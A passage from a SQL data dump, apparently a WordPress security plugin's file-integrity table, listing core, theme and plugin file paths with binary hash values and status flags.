F�����KX','黩�D��-P��ٙϣ�q�T*\0�[���^^��','',0,'?'),('U���4|)-�\0','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ca.js',0,'��jjea�j�5_��}','��jjea�j�5_��}','m�����ݖ��D�N������\"���','',0,'?'),('U�\\p{J��O�Q�&','wp-includes/SimplePie/Cache/Base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ĞA�ʖ�䦴j��','��oO��w��~9K����4oY�[K�e��\\RG','',0,'?'),('U0��z����\rӃ','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-s3-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�V�4��_���K8�','E�T>{]DL��;ٞ�`~q@G���Mu�:','',0,'?'),('U\"r�Dz�*��!��?vl','wp-content/plugins/spam-captcha/core/img/valid.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ei�\no~{�kz�h�','����3�,l�T.�B���hm�f�&�t���\Z�','',0,'?'),('U.�]�����㹧r�','wp-content/themes/fabulous-fluid/js/jcf.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��Х��ha6�E�g�','�|{��$�YX�:7\rd�Q\Z���o����XO}G','',0,'?'),('U4�;�!�~ʠ13�`','wp-content/themes/nirvana/fonts/opensans-light-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꤞ�� X�HV�d@��','z�a\\J8Xg��UH��\ry�nJ3��qޯ���U','',0,'?'),('U;ˡ����l�G0�','wp-content/themes/point/page-fullwidth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��SЪԱ��g��o@','[�f�|��4DT	}ĺ����e����֔,nK�','',0,'?'),('U=�@Kyð���Ɖ','wp-content/plugins/unyson/framework/includes/term-meta/function_fw_term_meta_setup_blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΰ��Z�V򂆠��','� �V�!f���o�|E���ON���\0�أ���','',0,'?'),('UI�_����Ym���_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#�W��P��2oY','�v�����4\'���w��h�<|Z�4Q8�xǃ5','',0,'?'),('UX<��@��A:��E','wp-content/plugins/spam-captcha/core/lang/SL_framework-ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���L�R�}�����[','~���	��L���o��b͖7�1�o�~����','',0,'?'),('Ue�tA&�R|��\rQV','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�1�`�Uy�+�۟��','�4_�����H1h(�p��A�9u���^�f�B','',0,'?'),('U�.��G\0��h7K','wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{��Dz��겊��T','s�׷my(�[�~��M������N�Ԙ��;i','',0,'?'),('U� $A=�He�|�zȖ(','wp-includes/Requests/SSL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��������','�}I^L�\\95�N�Y���;�?z��aE=�','',0,'?'),('U���h�1a�=v��','wp-content/themes/verbosa/content/content-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','++�η��M�)���p��','�tt��_��.>�y�;�{!h��I	�U̟����i','',0,'?'),('U��!����>�)y<`�','wp-content/themes/wen-business/third-party/cycle2/js/jquery.cycle2.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�x!�yFѮ,�+�','F�1�[�8qA\rHo�46����{�(5&W9�[�','',0,'?'),('U��NC�����ԅ','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.servers.php',0,'-T^T�f�-}ԣ� �','-T^T�f�-}ԣ� �','���.T�K�P��\ZՙJ��l4���_P','',0,'?'),('U�nɓb4lZ,I','wp-admin/css/about-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gq��:�_9��','j�6Qv���Z�TH��X� �ˤ���ڳ���䉭','',0,'?'),('U�x��S}��)�g�DI','wp-content/plugins/unyson/framework/extensions/breadcrumbs/includes/class-breadcrumbs-builder.php',0,'�#���f���~6�','�#���f���~6�','Hp����j�rb���	��|�˘f�q��x*','',0,'?'),('U�~�UO:c#3#W��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-configure-settings.php',0,'9��@E�L�ǟg:��z�','9��@E�L�ǟg:��z�','y�c�x�tБ���~^tК�gV�\\�Ǎ#','',0,'?'),('U���$i\"u��&��9','wp-includes/images/crystal/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l��ڤ�;�=','��S\rI��U��9_<�f`��&HYw�u�','',0,'?'),('UŧD �R�a����','wp-content/plugins/contact-form-7/languages/contact-form-7-sq.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�,��r�͜�|Ӂ�','.�!�4��t�.~�3�NF�8M��o�k	N�','',0,'?'),('U���#e�q�e�ͫ�','wp-content/themes/nirvana/images/socials/GoodReads.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�cx�¸|1�?Oz','5^UJ����U&p�B�<\0Ҕ�{d���pt�I','',0,'?'),('U�^�� H�T�7j','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\'���Y�p','�����΃,�\"w�,��L� Rj\0��)M�o�','',0,'?'),('U�&���\Zf�x�M%��','wp-content/themes/square/inc/widgets/widget-personal-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LʎA\r��k\'�_����','���Q�ŀ$ŏ<S���,�����[�SmO�#�','',0,'?'),('U�d�S�@�V�▞� ','wp-content/plugins/dw-social-share/assets/img/style-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\ZW����=*\0�[�\Z�','��~)�&²N���N�۽����tH��D ','',0,'?'),('U��h��8W=H�%�L��','wp-content/plugins/wordpress-seo/js/dist/wp-seo-post-scraper-350.min.js',0,'*G���y�H��C!','*G���y�H��C!','h�ʥgޟ�\'`=�%#����Hh�5�Ko','',0,'?'),('V*�\0��;g��D�=','wp-content/themes/the-minimal/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G��g�^��1҆}`_,','È�T\'��߁A#7p~�~�M%UH	,.h�#��\Z�','',0,'?'),('V�Z|�5����\n�P�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/options.php',0,'�w��~���Ӵ-���','�w��~���Ӵ-���','�C�k4�)H�e���2ܰ.<���l�����U','',0,'?'),('V	�!��������]','wp-content/plugins/unyson/framework/includes/option-types/datetime-range/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"ɗ��|ٗ�]��','�F-�њxDc�CM����a��CU,���{&�','',0,'?'),('V\n��U`�_�5���8','wp-includes/js/customize-base.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M>_2��<6�ɭ��',';�`�.�^wr�w����_Xn\0F�7����k`�h','',0,'?'),('V$(/�R�)]ò��','wp-content/themes/fabulous-fluid/images/slider-img2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�s�����WO�','K�,�7V%q�,轋\nϕN<�Jl?�I','',0,'?'),('V���\Z��_�R��','wp-content/themes/twentynineteen/js/priority-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�~&*mB��T@�GI�','D(�Tu}5{������ \0+��5g7`�)�y�','',0,'?'),('V�\r�3#��J��{','wp-includes/sodium_compat/composer.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��NKp@}���\r�|','���a���<K�-��Ìb=7t�#�-8��/��`','',0,'?'),('V#7A�����@�?���)','wp-content/plugins/wordfence/views/unsupported-php/admin-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(`��HMD��A�7�9','y��I~	@V�Y247�&�U��uމ����','',0,'?'),('V)��>�R}��,S��','wp-content/themes/wen-business/inc/base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{w�6�V}���r��%��','�i�)���45j��xg��9�īB$��s���','',0,'?'),('V2�L��\0ۺ��','wp-includes/js/jquery/ui/controlgroup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�##�=�F=��\\�v','��>733hE}���z�[)�e�Z0�ߨ!�$/Ӿ�','',0,'?'),('V33�rTC�@U�~�\n�\n','wp-content/plugins/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/Composer52/AutoloadGenerator.php',0,'�d\Z��\r(v:`�N�\n','�d\Z��\r(v:`�N�\n','��qG��\"w%\Z���ۻށg��\\��4^W��','',0,'?'),('V8��8��ߟ\rZ�5','wp-content/themes/twentynineteen/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��n䄼��a�','�4�x\"�#�4�ϙ��w2�E��7�l�4�1�','',0,'?'),('V?�O�N���e�ZF\\�','wp-includes/js/jquery/ui/accordion.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Z����a��','�\"����!f�~xXW��ۜ��4�Ȗ$:��2/','',0,'?'),('VH�l|��0l�H�','wp-content/plugins/unyson/framework/includes/option-types/icon-v2/static/js/icon-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z����V��ܔ�#�','��J_�9�Vz���3�	/>���A.!d��>�z96','',0,'?'),('VL6�7G^l%D5z3��','wp-includes/default-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('VU0\\��%�k�:V�٦�','wp-content/plugins/wordpress-seo/admin/views/partial-alerts-errors.php',0,'%-��H��Xwk����p','%-��H��Xwk����p','�$�MX��U�X���	���K��}�D��','',0,'?'),('V_���R<C�eEve�E','wp-content/themes/verbosa/admin/images/coffee.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N�)U6��','vq�u�eR�G?xd�d<�;\"��i�w�Qp�','',0,'?'),('Vne!�z0u1?��','wp-includes/shortcodes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ڳW�]��ԢIJa�','�2}שּׂ�NC��it���Mw�y#&�آ�Ro�','',0,'?'),('Vrm�KE�p�j��6�','wp-admin/images/w-logo-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[N�W��_p�w�0','ޣ^Q�t�3�H�unU❻��~�\'�T2','',0,'?'),('Vt��~Vi��Y��\0�','wp-content/themes/fabulous-fluid/js/jcf.range.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����k+��\Z�Ȥ{','G�/��!����W�Ɋn�Ѷq��z��JQ*�','',0,'?'),('V�����댏$�x','wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\-�ݦ^�u��.&','d�&�J�e���$��mf���D�%��Y�$','',0,'?'),('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�T^z[\"��\Zo��','A����_}��Q�\"�gV�UْP��(���6l','',0,'?'),('V�Bh���K�F�R	?','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/iterator/class-ai1wm-recursive-directory-iterator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��b�{�N:�FWn�{','�&�I���T.�}}\"�n/�W��ӕ�>��+','',0,'?'),('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+��9��lw��{',')M=y����3z@`�\n�E��#}h�5���d','',0,'?'),('V�3��x��~J�','wp-content/themes/clean-magazine/languages/da_DK.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'�a0�3�D�v>�j�','L����%��$�!49�e�<��_Px��p�j�','',0,'?'),('V�iW�PҪ5�E4���y','wp-content/plugins/wordpress-seo/js/dist/select2/select2.min.js',0,'�|��UO{�i6�Ӣ4','�|��UO{�i6�Ӣ4','�h�}%�~um-�T�b��U7/������?�0','',0,'?'),('V�[{N���T�Lѱk','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/jquery.fs.wallpaper.min.js',0,'�*A����}�8�g�','�*A����}�8�g�','��j�*�{4�\ZA\'�6}M�Bq�\"vWM4}X��','',0,'?'),('V��,�|� �Ojg��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pl.js',0,'�&�է\n�B�V�?~','�&�է\n�B�V�?~','ja�6�:b��&O2���c��5����mp�.�R�','',0,'?'),('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),('W��u�Q\no<�,	@','wp-content/plugins/wordpress-seo/vendor/xrstf/composer-php52/lib/xrstf/Composer52/ClassLoader.php',0,'ȹ	�Z^��+�}i��','ȹ	�Z^��+�}i��','���N{>�Z���ށ�d@�iV�w��WU�;�','',0,'?'),('Wk��m��`�^ScV�G','wp-content/plugins/contact-form-7/includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�����S��<��','>�c��rou5�0<�������j\'�9ޝ���^�\r','',0,'?'),('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\'r��Z�1(OP;��','�������}9a�2�jNW��Fu�Y��y����','',0,'?'),('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),('W8x\"�ެ|�{��f=�','wp-content/themes/travelify/languages/de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��蘨�S����{:','�oDp�`��0fNO�.����j�F.KX�','',0,'?'),('W;1C\\:~��D���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-logged-in-users.php',0,'x?nj579pY�g��O�','x?nj579pY�g��O�','��m�8Z�g�;%{a_��<����Y݉�i��','',0,'?'),('WHm��[�u�jsA�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/translation.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|G�\r��AF����ua>','SZ\0M�Ţ�?!H#�-�]���j\r��I��|��a','',0,'?'),('WlT�r��K���ZN','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/class-fw-shortcode-row.php',0,'��*R1�W9�^ ��=�','��*R1�W9�^ ��=�','4I,��-���٫<%xt��]���>C��{/','',0,'?'),('Wl[_��-�콞	�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-brute-force-menu.php',0,'���1�\'uk-��m�$','���1�\'uk-��m�$','�D7�RQ��ƃ�_\\�\"�D��}���o�.','',0,'?'),('Wn	\"��6YUK�Ϫ','wp-content/themes/hueman/functions/czr/controls/class-multipicker-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ā�Zz����Xqyd�','��k#���:_+���q;C��#��x�wxP','',0,'?'),('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kӞw��\"���M��','z�v�l������!1L���+\0�.�i��kIj','',0,'?'),('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�|��s,�=�K#�','6���ly�6ɦi��3U���,�E[鲓9��','',0,'?'),('W{�g- X��\'=n8','wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i\r|&�Ĉ3�d!ک9�','{��uo�b��jxa��[S\'K&��S�%\nAi��','',0,'?'),('W�@BŶ\'���1���(','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-clean.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H����t�Y�TzX','�����jk5�̨���F4�����-�jЎ','',0,'?'),('W�������g��T','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.pl.php',0,'H��s�%�޲�)��~8','H��s�%�޲�)��~8','���B�u5��f,��K?q1HK�%;O�#����K','',0,'?'),('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T	��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),('W�U��?��tl�/W >','wp-content/themes/twentynineteen/style-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a2[��6��g���','��{EolP,qh�O������F�	���Df�','',0,'?'),('W�\\. ����srT�','wp-content/themes/sg-window/publication/inc/template-tags.php',0,'Iv2��]�E��E|�#','Iv2��]�E��E|�#','�*�S��,�6�/��2��Ѿ$�T(���\\j.','',0,'?'),('W�->�)c�����2�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('W���euK�Y�GMO`�','wp-content/themes/nirvana/includes/ajax.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r1&�(A�6���','G��/W�	�[�\\��tRh�0{#�]��\'�','',0,'?'),('W������ÀB�pV�\"','wp-content/plugins/spam-captcha/core/lang/SL_framework-zh_CN.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ol}��	��Py�K>2','�g�:+����̘�@�Wd\"\"�YO�syq=�\n� ','',0,'?'),('X��\\shv]�iB�','wp-content/plugins/wordfence/waf/wfWAFGeoIP2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','݇�(�0,m�G_Y�3','^�)o�B������f�g�*�V�P�?�~��u:','',0,'?'),('X�0m��r���+j�','wp-content/themes/nirvana/fonts/ubuntu-r-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:2���N�Gd��� ','�ͼN�;�gPͷ4u�\r#�^7����Ps��','',0,'?'),('Xͮ���xⷙ�#��','wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php',0,'?��T�1�˙\r���','?��T�1�˙\r���','��M�@]�i_�+�4��,{��\"z�w�q�*�t%','',0,'?'),('X+ٴ���3��0�1�','wp-content/themes/twentytwentyone/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��v��M������J��','aR�%��\Z��*<\0���M��P���.��/��B','',0,'?'),('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_	�$�$~�LO�a��6���_','',0,'?'),('X<���,\0����K���','wp-content/themes/skt-construction-lite/images/img_404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�����Q.�$��','w<�$��F�uQ#����0�z+nvw\"R��','',0,'?'),('XX�?\Z۱IL�s�H!','wp-content/plugins/dw-social-share/dw-social-share.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ս��C��3��','?z�ĿЖ��\'?�a��V�s[m;r5�B�3�h','',0,'?'),('X_�A4�y�n���g=i','wp-content/themes/verbosa/content/content-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�RYU^�r�p,3�ɏl','����`l`,�Y(ՠ�0Q��1��r\'��6�ϭ�','',0,'?'),('Xk�f9���ܯ9','wp-content/plugins/unyson/framework/static/libs/qtip/css/jquery.qtip.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J���+�h5l{M�','L+��K�ê*}���^���I�Ҹg�G�U�_1�','',0,'?'),('X��8�Q��j�!�8{B�','wp-content/themes/accelerate/inc/post-formats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q�ρ��^��7���','d����9���^�1[�S-I^H�h~�8�)�','',0,'?'),('X��2D��e�^���','wp-content/themes/mh-magazine-lite/content-large.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/��B����y��1�','�S3�a��V1:�Vz�������1�wv��ȱ','',0,'?'),('X��S��Eb��PUjgɴ','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.nl.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~����cQo�9)`B,',']��C�\Z�p����������Yf�y��6da','',0,'?'),('X��M����xڳ�J�','wp-includes/Requests/Hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�� ���gx�i���','�՚���� Q�憐D�P��؂_?y�`�����','',0,'?'),('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),('X���v�\Zƒ��\"�$','wp-includes/Requests/Exception/HTTP/409.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�i�~*=����','���_M��8U���.pF����w�:E`�MB��','',0,'?'),('X����Q��Ω\0Y�z5','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-download.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�\\>��\Zҽ\\�','�\n����f����\r����R��>���\Zˁ','',0,'?'),('X�?M-H?���Al8/','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-acct-activity.php',0,'#�#+2O��yW�F','#�#+2O��yW�F','�%o���^�z�߳���ʕ�.S��h�)�/�dM','',0,'?'),('X�*I�Gq0 ���u	��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/includes/template-component/class-fw-ext-builder-templates-component-section.php',0,'�ZJ ]i[�b&�\"Z','�ZJ ]i[�b&�\"Z','���8hg���f�K�36�Ң)B�mI�%','',0,'?'),('X�\"R��]�u�-�\".','wp-content/themes/hueman/option-tree/assets/js/ot-postformats.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��*\Z��uoJx��','��.���A�׼v�\Z� �?�~��M��\Z��','',0,'?'),('X�\nR՛D!�(\'J','wp-content/plugins/spam-captcha/img/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�wÍ���\0��','\n�Iw@E�ƻ�T�J`p	x�K׮s-�ip]l$�','',0,'?'),('X�0�C|�!h�ϼX','wp-content/themes/alpha-store/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LmL�j�{C86��V��','�v<���u��٣0�5�<\n|�W���ڄs','',0,'?'),('X�s��Yq���ePL','wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�� ]�9��~n�ǭU','I��}:O\\\"/B�{\"�n\rV��n�\n�o���1ˋ','',0,'?'),('X�^g�@���{+?�W','wp-content/themes/mh-magazine-lite/includes/widgets/mh-posts-focus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�y�	�`I\\��9EL�','�*����x��~7�R�h��xF����9A�','',0,'?'),('X�[⋘H�n��̖	$','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/ui-bg_glass_55_fbf9ee_1x400.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��!j�ŕVۮH�{','���1�qˡ{K�Ȃl�]b�78�Z/6��1','',0,'?'),('X���G������z�X','wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��v�2��ַ���A�','5ۮ�/���G�i��i�S���ؚEQ��Y���Q','',0,'?'),('X��{y�M�?��Bl��','wp-content/themes/travelify/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��b[)r��p;Wlp�','F�������Iq���\Z�����\n��Bύ','',0,'?'),('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k(ʫ�ݑ伉����\"','�ڴ��\'��(X�����\"��Ocn,Mq`�D�','',0,'?'),('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�U���Ƥ����','��f,p��`��qR��2�\Z^v�6��`��s�$','',0,'?'),('XԒ�U����n.�ֽ_','wp-content/themes/square/js/elastiStack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����l�.YHU�','2��\'2u����wq1)�\0�p0��-ț�«C���','',0,'?'),('X�;�vC�@�5����P','wp-content/themes/wen-business/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>9�\\��s�do����','�l�%��R@VE��_�Y��hĴd;кb0_','',0,'?'),('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T��������','d�Vx�:������I�_��6�d��/5�7��E�','',0,'?'),('X�0�y4�7u�=HV','wp-content/themes/travelify/library/structure/footer-extensions.php',0,'�;��	�8^8ob�3','�;��	�8^8ob�3','CX��M�HC���u�R�\"�>c����','',0,'?'),('Y��ut���ƗSf~6','wp-content/themes/wen-business/wen-customizer/assets/css/wen-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���¥Ta�r(D�+W�','\"�b���p�!�/\\qM�)��܌��x0*���K�','',0,'?'),('Y\n<f�\Z�T挕�߃�','wp-content/themes/hueman/assets/front/js/_parts/_main_base.part.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�Dh�5�)uNBA','�Z�l��ss��6h��[ͫ�@\n��;�4F�`�','',0,'?'),('Y\n?�5��tm��!�3�','wp-content/themes/twentyseventeen/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p�-��b9��S3<','/��qy�d�E>^3��i%�n�\0\"����K','',0,'?'),('Y\nǶ�����8�9','wp-content/themes/sg-window/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�\Z����F��:�','	l�-���\\e9\Z���1߾@\'7�Rm��7','',0,'?'),('YU�=TG�d#��@�&�','wp-content/themes/supernews/assets/library/Font-Awesome/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('Yߌڧ��M�HX�!Qw','wp-content/themes/aqueduct/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a�>�A`amy�RB','�8+�nt�З���bIy�Y��)��Ј�~','',0,'?'),('Y����bڧ,��J','wp-includes/Requests/Exception/HTTP/405.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8т�m!�Ҭ����','j�b�횄��^U�sv8�$b����M�3y�','',0,'?'),('Y��E�q�{V�Ǭ','wp-content/themes/nirvana/fonts/opensans-bold-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�+�R�O�y�\\e�','s[�ev�]�p����\\]�{\nG��ʂ�?$�q','',0,'?'),('Y ��S�\0�9Y��','wp-content/themes/wen-business/third-party/bootstrap/bootstrap.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�C�(�S^���%','���K@V�\n����F���\n�d)$